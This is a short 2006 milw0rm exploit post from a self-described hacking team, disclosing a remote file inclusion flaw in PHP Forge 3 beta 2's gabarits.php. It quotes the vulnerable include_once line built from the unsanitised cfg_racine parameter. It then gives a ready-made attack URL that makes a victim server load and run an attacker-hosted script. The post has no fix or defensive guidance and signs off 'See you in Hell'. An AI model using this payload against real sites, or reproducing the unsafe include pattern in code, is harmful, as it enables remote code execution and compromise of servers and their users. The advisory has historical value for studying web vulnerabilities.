PHP Forge <= 3 beta 2 (cfg_racine) Remote File Inclusion Vulnerability

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ phpforge3b2(cfg_racine) Remote File Inclusion Vulnerability ------------------------ Virangar Security Team www.virangar.org &#62;public www.virangar.net &#62;priv8 -------- Discoverd By : Snake & hadihadi_zedehal contact : Snake.Apollyon@YaHo0.com ** hadihadi_zedehal_2006@YaHo0.com special tnx 2: A.Nosrati * l0pht.Blackhot * Kouros.virus & all virangar members greetz:hadi_aryaie2004 * ahmad_virangar2004 * mahtab_e66 --------- bug found in file :gabarits.php Remote : Yes Critical Level : Dangerous web:http://phpforge.oirac.com/ --------- vlu codes: include_once($cfg_racine.&#34;inc/systeme.php&#34;); --------- http://www.victim.com/[patch]/inc/gabarits.php?cfg_racine=[evil script] -------- See you in Hell!!..... \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ # milw0rm.com [2006-07-22]